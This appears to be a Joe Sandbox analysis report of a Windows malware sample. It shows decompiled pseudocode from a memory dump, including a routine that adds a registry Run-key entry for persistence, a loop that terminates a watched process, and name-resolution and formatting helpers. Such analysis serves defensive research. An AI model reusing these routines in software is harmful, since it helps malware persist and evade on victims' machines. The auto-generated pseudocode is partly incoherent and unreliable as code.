    0x0040a0ef
    0x0040a0f0
    0x0040a0f1
    0x0040a0f5
    0x0040a0f7
    0x0040a0fb
    0x0040a0fc
    0x0040a101
    0x0040a104
    0x0040a107
    0x0040a10e
    0x0040a126
    0x0040a13e
    0x0040a288
    0x0040a28a
    0x0040a28f
    0x0040a291
    0x00000000
    0x00000000
    0x0040a1a7
    0x0040a1ac
    0x0040a1b3
    0x0040a1f1
    0x0040a1f6
    0x0040a1f8
    0x0040a217
    0x0040a21c
    0x0040a21e
    0x0040a23f
    0x0040a244
    0x0040a246
    0x0040a25b
    0x0040a25b
    0x0040a25d
    0x0040a263
    0x0040a26a
    0x0040a25f
    0x0040a25f
    0x0040a261
    0x0040a278
    0x0040a282
    0x00000000
    0x00000000
    0x00000000
    0x0040a261
    0x0040a248
    0x0040a24f
    0x0040a254
    0x0040a254
    0x0040a220
    0x0040a227
    0x0040a22c
    0x0040a22c
    0x0040a1fa
    0x0040a201
    0x0040a206
    0x0040a206
    0x0040a287
    0x0040a287
    0x0040a1b5
    0x0040a1be
    0x0040a1cc
    0x0040a1d6
    0x0040a1db
    0x0040a1db
    0x0040a1b3
    0x0040a144
    0x0040a144
    0x0040a149
    0x0040a14c
    0x0040a15a
    0x0040a156
    0x0040a156
    0x0040a156
    0x0040a15e
    0x0040a199
    0x0040a160
    0x0040a185
    0x0040a166
    0x0040a166
    0x0040a168
    0x0040a16a
    0x0040a16c
    0x0040a175
    0x0040a17f
    0x0040a17f
    0x0040a16c
    0x0040a184
    0x0040a184
    0x0040a184
    0x0040a190
    0x0040a15e
    0x0040a297
    0x0040a299
    0x0040a29c
    0x0040a29f
    0x0040a2b1

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 0041763C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63
    C-Code - Quality: 90%
    			E0041763C(void* __ecx, intOrPtr* __edx) {
				char _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				void* _t22;
				void* _t35;
				intOrPtr* _t38;
				void* _t47;

				_t47 = __ecx;
				_t38 = __edx;
				E00403E88(__ecx);
				if(_t38 == 0) {
					return E00403EDC(_t47, "0.0.0.0");
				}
				if( *_t38 + 0xd0 - 0xa >= 0) {
					_t22 = E00404348(_t38);
					_push(_t22);
					L0040C4F8();
					if(_t22 != 0) {
						_v48 = 0;
						_v44 = 0;
						_v40 = 0;
						_v36 = 0;
						_v32 = 0;
						_v28 = 0;
						_v24 = 0;
						_v20 = 0;
						return E00407CEC("%d.%d.%d.%d", 3,  &_v48, _t47);
					}
				} else {
					_t35 = E00404348(_t38);
					_push(_t35);
					L0040C4C8();
					_t22 = _t35 + 1;
					if(_t22 != 0) {
						return E00403EDC(_t47, _t38);
					}
				}
				return _t22;
			}















    0x00417642
    0x00417644
    0x00417648
    0x0041764f
    0x00000000
    0x004176e4
    0x0041765b
    0x0041767a
    0x0041767f
    0x00417680
    0x00417687
    0x00417695
    0x00417699
    0x004176a3
    0x004176a7
    0x004176b1
    0x004176b5
    0x004176bf
    0x004176c3
    0x00000000
    0x004176d6
    0x0041765d
    0x0041765f
    0x00417664
    0x00417665
    0x0041766a
    0x0041766b
    0x00000000
    0x00417671
    0x0041766b
    0x004176ef

    APIs
    • inet_addr.WSOCK32(00000000), ref: 00417665
    • gethostbyname.WSOCK32(00000000), ref: 00417680
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 004185E8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57
    C-Code - Quality: 68%
    			E004185E8(intOrPtr __eax, void* __ebx, char __edx) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				char _v20;
				int _t28;
				char* _t41;
				intOrPtr _t47;
				void* _t51;

				_v20 = 0;
				_v12 = __edx;
				_v8 = __eax;
				E00404338(_v8);
				E00404338(_v12);
				_push(_t51);
				_push(0x418692);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51 + 0xfffffff0;
				RegOpenKeyExA(0x80000001, "software\\microsoft\\windows\\currentversion\\run", 0, 0xf003f,  &_v16);
				_t41 = E00404348(_v12);
				E00404080( &_v20, _t41);
				_t28 = E00404148(_v20);
				RegSetValueExA(_v16, E00404348(_v8), 0, 1, _t41, _t28);
				RegCloseKey(_v16);
				_pop(_t47);
				 *[fs:eax] = _t47;
				_push(E00418699);
				E00403E88( &_v20);
				return E00403EAC( &_v12, 2);
			}











    0x004185f1
    0x004185f4
    0x004185f7
    0x004185fd
    0x00418605
    0x0041860c
    0x0041860d
    0x00418612
    0x00418615
    0x0041862d
    0x0041863a
    0x00418641
    0x00418649
    0x00418661
    0x0041866a
    0x00418671
    0x00418674
    0x00418677
    0x0041867f
    0x00418691

    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    • software\microsoft\windows\currentversion\run, xrefs: 00418623
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00418B04, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
    C-Code - Quality: 72%
    			E00418B04() {
				char _v8;
				intOrPtr* _t3;
				long _t13;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t26;

				 *((intOrPtr*)(_t3 +  *_t3)) =  *((intOrPtr*)(_t3 +  *_t3)) + _t4;
				_push(0);
				_t26 = 0;
				_push(_t24);
				_push(0x418b82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				L2:
				E00403F20( &_v8,  *0x454a5c);
				E00418A14(0x454a5c, _t20, _t21);
				E00404294(_v8,  *0x454a5c);
				if(_t26 != 0) {
					_t26 = E00418560(_t26);
					if(_t26 == 0) {
						_t13 =  *0x454a60; // 0x0
						TerminateProcess(OpenProcess(1, 0, _t13), 0);
					}
				}
				Sleep("h N");
				goto L2;
			}










    0x00418b06
    0x00418b0f
    0x00418b17
    0x00418b19
    0x00418b1a
    0x00418b1f
    0x00418b22
    0x00418b25
    0x00418b2a
    0x00418b2f
    0x00418b39
    0x00418b3e
    0x00418b45
    0x00418b47
    0x00418b4b
    0x00418b5b
    0x00418b5b
    0x00418b47
    0x00418b65
    0x00000000

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00418B0C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32
    C-Code - Quality: 75%
    			E00418B0C() {
				char _v8;
				long _t10;
				void* _t17;
				void* _t18;
				intOrPtr _t20;
				void* _t21;

				_push(0);
				_t21 = 0;
				_push(0x418b82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				while(1) {
					E00403F20( &_v8,  *0x454a5c);
					E00418A14(0x454a5c, _t17, _t18);
					E00404294(_v8,  *0x454a5c);
					if(_t21 != 0) {
						_t21 = E00418560(_t21);
						if(_t21 == 0) {
							_t10 =  *0x454a60; // 0x0
							TerminateProcess(OpenProcess(1, 0, _t10), 0);
						}
					}
					Sleep("h N");
				}
			}









    0x00418b0f
    0x00418b17
    0x00418b1a
    0x00418b1f
    0x00418b22
    0x00418b25
    0x00418b2a
    0x00418b2f
    0x00418b39
    0x00418b3e
    0x00418b45
    0x00418b47
    0x00418b4b
    0x00418b5b
    0x00418b5b
    0x00418b47
    0x00418b65
    0x00418b65

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 0040BAA0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
    C-Code - Quality: 100%
    			E0040BAA0() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x41912c = _t1;
				}
				if( *0x41912c == 0) {
					 *0x41912c = E004076D4;
					return E004076D4;
				}
				return _t1;
			}





    0x0040baa6
    0x0040baab
    0x0040baaf
    0x0040bab7
    0x0040babc
    0x0040babc
    0x0040bac8
    0x0040bacf
    0x00000000
    0x0040bacf
    0x0040bad5

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAA6
    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAB7
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    Function 00409161, Relevance: 6.4, Strings: 5, Instructions: 128
    C-Code - Quality: 81%
    			E00409161(void* __ecx, void* __edx, void* __edi) {
				signed int _t166;
				signed int _t168;
				signed int _t170;
				signed int _t172;
				signed int _t181;
				void* _t183;
				intOrPtr _t224;
				intOrPtr _t227;
				signed int _t232;
				void* _t250;
				void* _t252;
				intOrPtr _t272;
				signed int _t281;
				void* _t282;

				L0:
				while(1) {
					L0:
					E004089D8(_t282);
					_t281 =  *((intOrPtr*)(_t282 - 4)) - 1;
					if(E004077C0(_t281, 5, 0x409418) != 0) {
						_t166 = E004077C0(_t281, 3, 0x409420);
						__eflags = _t166;
						if(_t166 != 0) {
							_t168 = E004077C0(_t281, 4, 0x409424);
							__eflags = _t168;
							if(_t168 != 0) {
								_t170 = E004077C0(_t281, 4, 0x40942c);
								__eflags = _t170;
								if(_t170 != 0) {
									_t172 = E004077C0(_t281, 3, 0x409434);
									__eflags = _t172;
									if(_t172 != 0) {
										E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
									} else {
										E004089A0(_t282);
										_pop(_t250);
										E00408908( *((intOrPtr*)(0x4546fc + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t250,  *((intOrPtr*)(_t282 + 8)));
										 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
									}
								} else {
									E004089A0(_t282);
									_pop(_t252);
									E00408908( *((intOrPtr*)(0x454718 + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t252,  *((intOrPtr*)(_t282 + 8)));
									 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
								}
							} else {
								__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
								if( *((short*)(_t282 - 0x16)) >= 0xc) {
									_t224 =  *0x454694; // 0x0
									E00408908(_t224, 4,  *((intOrPtr*)(_t282 + 8)));
								} else {
									_t227 =  *0x454690; // 0x0
									E00408908(_t227, 4,  *((intOrPtr*)(_t282 + 8)));
								}
								 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
								 *((char*)(_t282 - 0x1e)) = 1;
							}
						} else {
							__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
							if( *((short*)(_t282 - 0x16)) >= 0xc) {
								__eflags = _t281;
							}
							E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
							 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
							 *((char*)(_t282 - 0x1e)) = 1;
						}
					} else {
						__eflags =  *((short*)(__ebp - 0x16)) - 0xc;
						if( *((short*)(__ebp - 0x16)) >= 0xc) {
							__esi = __esi + 3;
							__eflags = __esi;
						}
						__eax =  *(__ebp + 8);
						__edx = 2;
						__eax = __esi;
						__eax = E004088C4(2,  *(__ebp + 8));
						 *(__ebp - 4) =  *(__ebp - 4) + 4;
						 *((char*)(__ebp - 0x1e)) = 1;
					}
					while(1) {
						L109:
						_t164 =  *((intOrPtr*)( *((intOrPtr*)(_t282 - 4))));
						if(_t164 == 0) {
							break;
						}
						L1:
						 *(_t282 - 5) = _t164;
						asm("bt [0x419108], eax");
						if(( *(_t282 - 5) & 0x000000ff) >= 0) {
							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
							_t181 =  *(_t282 - 5);
							__eflags = _t181 + 0x9f - 0x1a;
							if(_t181 + 0x9f - 0x1a < 0) {
								_t181 = _t181 - 0x20;
								__eflags = _t181;
							}
							L5:
							__eflags = _t181 + 0xbf - 0x1a;
							if(_t181 + 0xbf - 0x1a >= 0) {
								L10:
								_t183 = (_t181 & 0x000000ff) + 0xffffffde;
								__eflags = _t183 - 0x38;
								if(_t183 > 0x38) {
									L108:
									E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
									continue;
								}
								L11:
								switch( *((intOrPtr*)( *(_t183 + 0x408d6b) * 4 +  &M00408DA4))) {
									case 0:
										goto L108;
									case 1:
										L12:
										E00408974(_t282);
										E004089A0(_t282);
										__eflags =  *((intOrPtr*)(_t282 - 0xc)) - 2;
										if( *((intOrPtr*)(_t282 - 0xc)) > 2) {
											E00408928( *(_t282 - 0xe) & 0x0000ffff, 4, _t288,  *((intOrPtr*)(_t282 + 8)));
										} else {
											E00408928(( *(_t282 - 0xe) & 0x0000ffff) % 0x64, 2, _t288,  *((intOrPtr*)(_t282 + 8)));
										}
										goto L109;
									case 2:
										L15:
										E00408974(__ebp) = E004089A0(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x24;
										 *(__ebp - 0xc) = E00408A18( *(__ebp - 0xc), __ebx, __ebp - 0x24, __esi, __ebp);
										__eax =  *(__ebp - 0x24);
										__eax = E00408908( *(__ebp - 0x24), __ecx,  *(__ebp + 8));
										goto L109;
									case 3:
										L16:
										E00408974(__ebp) = E004089A0(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x28;
										 *(__ebp - 0xc) = E00408B80( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
										__eax =  *(__ebp - 0x28);
										__eax = E00408908( *(__ebp - 0x28), __ecx,  *(__ebp + 8));
										goto L109;
									case 4:
										L17:
										E00408974(__ebp) = E004089A0(__ebp);
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
										if(__eflags < 0) {
											__eax =  *(__ebp + 8);
											__eax =  *(__ebp - 0x10) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E00408928( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax = 0x45469c[ *(__ebp - 0x10) & 0x0000ffff];
												__eax = E00408908(0x45469c[ *(__ebp - 0x10) & 0x0000ffff], __ecx,  *(__ebp + 8));
											} else {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax =  *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
												__eax = E00408908( *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
											}
										}
										goto L109;
									case 5:
										L23:
										E00408974(__ebp) =  *(__ebp - 0xc);
										__eax =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags = __eax;
										if(__eflags < 0) {
											E004089A0(__ebp) =  *(__ebp + 8);
											__eax =  *(__ebp - 0x12) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E00408928( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
												__eax =  *(0x4546fc + (__ax & 0x0000ffff) * 4);
												__eax = E00408908( *(0x4546fc + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
											} else {
												__eax = __eax - 1;
												__eflags = __eax;
												if(__eflags == 0) {
													E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
													__eax =  *(0x454718 + (__ax & 0x0000ffff) * 4);
													__eax = E00408908( *(0x454718 + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
												} else {
													__eax = __eax - 1;
													__eflags = __eax;
													if(__eax == 0) {
														__eax =  *(__ebp + 8);
														__eax =  *0x454684; // 0x0
														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
													} else {
														__eax =  *(__ebp + 8);
														__eax =  *0x454688; // 0x0
														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
													}
												}
											}
										}
										goto L109;
									case 6:
										L33:
										__eax = E00408974(__ebp);
										__eax = E004089D8(__ebp);
										 *(__ebp - 0x1f) = 0;
										__esi =  *(__ebp - 4);
										while(1) {
											L52:
											__al =  *__esi;
											__eflags =  *__esi;
											if( *__esi == 0) {
												break;
											}
											L34:
											__eax = __eax & 0x000000ff;
											__eflags = __eax;
											asm("bt [0x419108], eax");
											if(__eax >= 0) {
												L36:
												__eax = 0;
												__al =  *__esi;
												__eflags = 0 - 0x48;
												if(0 > 0x48) {
													L42:
													__eax = 0xffffffffffffff9f;
													__eflags = 0xffffffffffffff9f;
													if(0xffffffffffffff9f == 0) {
														L45:
														__eflags =  *(__ebp - 0x1f);
														if( *(__ebp - 0x1f) != 0) {
															L51:
															__esi = __esi + 1;
															__eflags = __esi;
															continue;
														}
														L46:
														__edx = 0x409418;
														__ecx = 5;
														__eax = __esi;
														__eax = E004077C0(__esi, 5, 0x409418);
														__eflags = __eax;
														if(__eax == 0) {
															L49:
															 *((char*)(__ebp - 0x1e)) = 1;
															break;
														}
														L47:
														__edx = 0x409420;
														__ecx = 3;
														__eax = __esi;
														__eax = E004077C0(__esi, 3, 0x409420);
														__eflags = __eax;
														if(__eax == 0) {
															goto L49;
														}
														L48:
														__edx = 0x409424;
														__ecx = 4;
														__eax = __esi;
														__eax = E004077C0(__esi, 4, 0x409424);
														__eflags = __eax;
														if(__eax != 0) {
															break;
														}
														goto L49;
													}
													L43:
													__eax = 0xffffffffffffff98;
													__eflags = 0xffffffffffffff9f;
													if(0xffffffffffffff9f == 0) {
														break;
													}
													L44:
													goto L51;
												}
												L37:
												if(0 == 0x48) {
													break;
												}
												L38:
												__eax = 0xffffffffffffffde;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													L50:
													__al =  *(__ebp - 0x1f);
													__al =  *(__ebp - 0x1f) ^ 0x00000001;
													__eflags = __al;
													 *(__ebp - 0x1f) = __al;
													goto L51;
												}
												L39:
												__eax = 0xffffffffffffffd9;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													goto L50;
												}
												L40:
												__eax = 0xffffffffffffffbf;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													goto L45;
												}
												L41:
												goto L51;
											} else {
												__eax = __esi;
												__eax = E0040B044(__esi);
												__esi = __eax;
												continue;
											}
										}
										L53:
										__ax =  *((intOrPtr*)(__ebp - 0x16));
										__eflags =  *((char*)(__ebp - 0x1e));
										if( *((char*)(__ebp - 0x1e)) != 0) {
											__eflags = __ax;
											if(__ax != 0) {
												__eflags = __ax - 0xc;
												if(__ax > 0xc) {
													__ax = __ax - 0xc;
													__eflags = __ax;
												}
											} else {
												__ax = 0xc;
											}
										}
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__edx =  *(__ebp + 8);
										__eax = __ax & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928(__ax & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 7:
										L61:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x18) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 8:
										L64:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1a) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 9:
										L67:
										__eax = E00408974(__ebp);
										__eflags =  *(__ebp - 0xc) - 1;
										if( *(__ebp - 0xc) != 1) {
											__eax =  *(__ebp + 8);
											__eax =  *0x45469c; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										} else {
											__eax =  *(__ebp + 8);
											__eax =  *0x454698; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										}
										goto L109;
									case 0xa:
										L70:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 3;
										if( *(__ebp - 0xc) > 3) {
											 *(__ebp - 0xc) = 3;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1c) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 0xb:
										goto L0;
									case 0xc:
										L90:
										E00408974(__ebp) =  *(__ebp + 8);
										__eax =  *0x454684; // 0x0
										__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										__eax = E004089D8(__ebp);
										__eflags =  *((short*)(__ebp - 0x16));
										if( *((short*)(__ebp - 0x16)) != 0) {
											L93:
											 *(__ebp + 8) = 0x409438;
											__edx = 1;
											E004088C4(1,  *(__ebp + 8)) =  *(__ebp + 8);
											__eax =  *0x45469c; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
											goto L109;
										}
										L91:
										__eflags =  *(__ebp - 0x18);
										if( *(__ebp - 0x18) != 0) {
											goto L93;
										}
										L92:
										__eflags =  *(__ebp - 0x1a);
										if( *(__ebp - 0x1a) == 0) {
											goto L109;
										}
										goto L93;
									case 0xd:
										L94:
										__eflags =  *0x454681;
										__eflags = __eax - 0x454681;
										 *__edi =  *__edi + __cl;
										__eflags =  *(__ecx - 0x75000000) & __bl;
									case 0xe:
										L97:
										__eflags =  *0x45468c;
										__eflags = __eax - 0x45468c;
										_t136 = __edi + __esi * 2 - 0x75;
										 *_t136 =  *(__edi + __esi * 2 - 0x75) + __dh;
										__eflags =  *_t136;
									case 0xf:
										L100:
										__esi =  *(__ebp - 4);
										while(1) {
											L104:
											__eax =  *(__ebp - 4);
											__al =  *__eax;
											__eflags = __al;
											if(__al == 0) {
												break;
											}
											L105:
											__eflags = __al -  *((intOrPtr*)(__ebp - 5));
											if(__al !=  *((intOrPtr*)(__ebp - 5))) {
												L101:
												__eax = __eax & 0x000000ff;
												__eflags = __eax;
												asm("bt [0x419108], eax");
												if(__eax >= 0) {
													_t146 = __ebp - 4;
													 *_t146 =  *(__ebp - 4) + 1;
													__eflags =  *_t146;
												} else {
													__eax =  *(__ebp - 4);
													 *(__ebp - 4) = E0040B044( *(__ebp - 4));
												}
												continue;
											}
											break;
										}
										L106:
										__eax =  *(__ebp + 8);
										__edx =  *(__ebp - 4);
										__edx =  *(__ebp - 4) - __esi;
										__esi = E004088C4(__edx,  *(__ebp + 8));
										__eax =  *(__ebp - 4);
										__eflags =  *__eax;
										if( *__eax != 0) {
											 *(__ebp - 4) =  *(__ebp - 4) + 1;
										}
										goto L109;
								}
							} else {
								__eflags = _t181 - 0x4d;
								if(_t181 == 0x4d) {
									__eflags = _t232 - 0x48;
									if(_t232 == 0x48) {
										_t181 = 0x4e;
									}
								}
								L9:
								_t232 = _t181;
								goto L10;
							}
						} else {
							E004088C4(E0040B024( *((intOrPtr*)(_t282 - 4))),  *((intOrPtr*)(_t282 + 8)));
							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
							_t232 = 0x20;
							continue;
						}
					}
					L110:
					 *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) - 1;
					_pop(_t272);
					 *[fs:eax] = _t272;
					_push(E00409410);
					return E00403EAC(_t282 - 0x28, 2);
				}
			}

















    0x00409161
    0x00409161
    0x00409161
    0x00409162
    0x0040916b
    0x0040917f
    0x004091b5
    0x004091ba
    0x004091bc
    0x004091f2
    0x004091f7
    0x004091f9
    0x0040923b
    0x00409240
    0x00409242
    0x00409282
    0x00409287
    0x00409289
    0x004092c9
    0x0040928b
    0x0040928c
    0x00409291
    0x004092ae
    0x004092b4
    0x004092b4
    0x00409244
    0x00409245
    0x0040924a
    0x00409267
    0x0040926d
    0x0040926d
    0x004091fb
    0x004091fb
    0x00409200
    0x00409217
    0x0040921c
    0x00409202
    0x00409206
    0x0040920b
    0x00409210
    0x00409222
    0x00409226
    0x00409226
    0x004091be
    0x004091be
    0x004091c3
    0x004091c5
    0x004091c5
    0x004091d3
    0x004091d9
    0x004091dd
    0x004091dd
    0x00409181
    0x00409181
    0x00409186
    0x00409188
    0x00409188
    0x00409188
    0x0040918b
    0x0040918f
    0x00409194
    0x00409196
    0x0040919c
    0x004091a0
    0x004091a0
    0x004093d8
    0x004093d8
    0x004093db
    0x004093df
    0x00000000
    0x00000000
    0x00408cdf
    0x00408cdf
    0x00408cea
    0x00408cf1
    0x00408d24
    0x00408d27
    0x00408d2f
    0x00408d32
    0x00408d34
    0x00408d34
    0x00408d34
    0x00408d36
    0x00408d3b
    0x00408d3e
    0x00408d4d
    0x00408d52
    0x00408d55
    0x00408d58
    0x004093c6
    0x004093d2
    0x00000000
    0x004093d7
    0x00408d5e
    0x00408d64
    0x00000000
    0x00000000
    0x00000000
    0x00408de4
    0x00408de5
    0x00408dec
    0x00408df2
    0x00408df6
    0x00408e28
    0x00408df8
    0x00408e10
    0x00408e15
    0x00000000
    0x00000000
    0x00408e33
    0x00408e3b
    0x00408e41
    0x00408e46
    0x00408e4c
    0x00408e52
    0x00408e55
    0x00000000
    0x00000000
    0x00408e60
    0x00408e68
    0x00408e6e
    0x00408e73
    0x00408e79
    0x00408e7f
    0x00408e82
    0x00000000
    0x00000000
    0x00408e8d
    0x00408e95
    0x00408e9e
    0x00408e9f
    0x00408e9f
    0x00408ea2
    0x00408ea8
    0x00408eac
    0x00408eb0
    0x00408eb3
    0x00408ea4
    0x00408ea4
    0x00408ec2
    0x00408ec6
    0x00408ecd
    0x00408ea6
